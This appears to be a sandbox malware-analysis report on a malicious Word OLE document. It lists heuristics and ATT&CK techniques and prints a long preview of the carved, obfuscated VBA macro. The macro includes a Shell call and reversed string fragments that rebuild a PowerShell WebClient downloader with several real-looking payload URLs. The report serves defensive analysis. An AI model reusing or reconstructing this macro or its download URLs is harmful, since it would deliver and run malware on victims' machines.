MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OLE document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The script contains a call to the 'Shell' function, which is highly suspicious and likely used to download and execute a secondary payload. The obfuscated nature of the script prevents a more detailed analysis of its exact function.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 177,664 bytes but its declared streams total only 36,034 bytes — 141,630 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41612 bytes |
SHA-256: e8e4a9ab77a4928fbc8cb5fba0e29ed3088aa229796744bc84559b8ab1632d5b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "baYpFlDs"
Sub Enqpod(FzTjbn)
Dim IJmlRR, XkEWEY
nzoit = 15996 = DBpXj
wVPtj = sPfSzm - CStr(51966) + jCmSkE - Tan(83101) - 34045 / 94758 / (60083 - CBool(8680) * 65327 / hFIzOk)
Dim kCVKp, jkHhp
SNUAOX = 75954 = UjYkpz
LKXVl = VKijc - CStr(55188) + YGJQq - Tan(24337) - 28895 / 34161 / (23558 - CBool(7956) * 88570 / aJlEil)
End Sub
Sub qoWIzJRHICjmBE(MFqQwMiDfXJM As String)
On Error Resume Next
Dim qHVak, EpzDq
muTDN = 43258 = tckrw
dvKsk = AvHlM - CStr(6951) + ZElWRO - Tan(41704) - 69474 / 15421 / (60642 - CBool(13773) * 11529 / hWrsG)
Dim WTHQt, NzqYiI
zhzDH = 11114 = cdWVP
mMXiD = fwhMS - CStr(77662) + ZERfLd - Tan(44265) - 99659 / 12665 / (81123 - CBool(70850) * 35709 / montwm)
[Shell] qKAZM + Chr(vbKeyC) + MFqQwMiDfXJM + QdLSUfPP + OLzKssDjWnL, lCrHA + 0 + lCrHA
Dim brIoQ, oBPDrT
MtooVF = 6694 = GZcvm
HndimA = pmDdE - CStr(98604) + OQLTiT - Tan(60557) - 98407 / 28354 / (84281 - CBool(1052) * 63902 / AURfs)
Dim ljNlYF, qXHlK
GcEqO = 18382 = SOIYl
FszUVX = aNuBim - CStr(26379) + cIrdh - Tan(67507) - 51323 / 60895 / (91889 - CBool(57925) * 5293 / bLWYo)
End Sub
Attribute VB_Name = "zTtDuoJT"
Sub JQsAi(XOzin)
Dim psowL, kBWctl
pabIK = 79400 = mfHkEK
ufEcQp = JbEGiD - CStr(47109) + whWHt - Tan(79979) - 66056 / 91307 / (12315 - CBool(78591) * 87359 / XJkEs)
End Sub
Function zDiNvbRjd()
On Error Resume Next
Dim DpVSz, vHfwWB
lHUjaO = 93590 = rMkwn
hbzqA = hziwd - CStr(65015) + MmJjYE - Tan(24517) - 15010 / 99554 / (5495 - CBool(50562) * 19937 / vkMdlU)
Dim pcjzI, fEmHln
XiXFJ = 34711 = VQWXUG
zJDiX = NvSuv - CStr(14860) + QNJops - Tan(20847) - 88920 / 85011 / (87817 - CBool(90502) * 39710 / wrYGI)
jFMZDj = JWzoLF("YTP9'+' + ci'+'l'+'b'+'up:vne2vD = '+'CD'+'S'+'2'+'vD;)o'+'Z9'+'@oZ9(t'+'ilpS.oZ9sE3D8", 78392 - 78392 + 6 + 78392 - 78392, 78392 - 78392 + 78 + 78392 - 78392)
Dim BVjuiY, UzcQd
BiOIH = 65675 = cviHQI
FUVWM = SGRkSb - CStr(30398) + XNRbQl - Tan(36859) - 75637 / 69476 / (67952 - CBool(34272) * 45874 / AFrZda)
Dim XrdsSi, XcvRKz
cGwKGq = 45844 = nnsHsk
ailCb = zmwihu - CStr(99211) + rAqjX - Tan(18190) - 52656 / 110 / (80148 - CBool(2921) * 70452 / uEpAL)
WPUKOTCs = JWzoLF("o1OT6+'UYY2vD;modn'+'ar '+')o'+'Z9to'+'Z'+'9+oZ9c'+'ejbo'+'-woZ9+oZ9eo'+'Z'+'9+oZ9'+'no'+'Z9(& = dsad'+'asn2v'+'D'((iq", 20244 - 20244 + 3 + 20244 - 20244, 20244 - 20244 + 111 + 20244 - 20244)
Dim DLCQjH, wdUAb
wYKvn = 4613 = Ualapj
Xwuww = rroQb - CStr(37995) + KajGzN - Tan(54045) - 77832 / 60626 / (68995 - CBool(17217) * 5019 / kVcZbb)
Dim zKURu, ToAjiE
BEqqht = 51309 = VlEQJl
VhcQKK = TkARJB - CStr(33534) + QrzZu - Tan(82935) - 78408 / 52892 / (61727 - CBool(2544) * 41913 / bYQBlv)
LDItjYhVE = JWzoLF("BjMOc:Vne$ (.|)29]rAHC[,)67]rAHC[+08]rAHC[+MuUdkQ6", 94564 - 94564 + 8 + 94564 - 94564, 94564 - 94564 + 41 + 94564 - 94564)
Dim STERu, CkFqPj
SBVMQ = 68824 = IjFvPo
XuUzj = hwALa - CStr(9041) + rGjlQR - Tan(93637) - 43399 / 49923 / (5876 - CBool(7354) * 70926 / ELmNI)
Dim wZzzpU, NXuZU
TiRdSb = 68558 = vJkCLw
WpSiB = PIzVmj - CStr(15277) + kUiui - Tan(84766) - 15443 / 39383 / (42389 - CBool(13959) * 44173 / BBQOw)
cRzbYJth = JWzoLF("cC68e'+'ilCbeW'+'.'+'t'+'eN.'+'m'+'etsy'+'S )oZ'+'9'+'tce'+'jbo-oZ9+oZ9'1R", 3809 - 3809 + 3 + 3809 - 3809, 3809 - 3809 + 68 + 3809 - 3809)
Dim Wlqhbv, GDVSI
rbcKoB = 16414 = FKCTLH
aOskYI = WRCtn - CStr(54360) + omCOb - Tan(59625) - 82173 / 48179 / (82361 - CBool(53672) * 24118 / zQaoOP)
Dim Hoojad, wtpfz
DQjvLh = 86094 = biORj
bjmHi = jioddj - CStr(39080) + mQtpRa - Tan(66706) - 96616 / 73163 / (38979 - CBool(39892) * 87168 / KfKaSq)
uHHaFhmZNcV = JWzoLF("MU50aB'+'u/m'+'oc.onikab//'+':'+'ptth@/XxYS'+'/su'+'.'+'ne'+'gac'+'//:ptth@/S'+'gaHG'+'0/mo'+'c'+'.puorg'+'icapra//:ptth@/hGXvYB/ku.'+'oc.ygol'+'o'+'nhc'+'et-'+'tna'+'rel'c", 76430 - 76430 + 2 + 76430 - 76430, 76430 - 76430 + 166 + 76430 - 76430)
Dim tQGhw, FVbDRb
CfKkY = 42 = mduSn
NYCiCL = LzVKMs - CStr(34414) + NWiCs - Tan(62571) - 70471 / 61135 / (41406 - CBool(48685) * 4005 / jWQVo)
Dim fTkdwV, EiJUs
qzSmW = 99239 = ifjnT
Nrvbh = SddEPV - CStr(24645) + anXCC - Tan(369
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.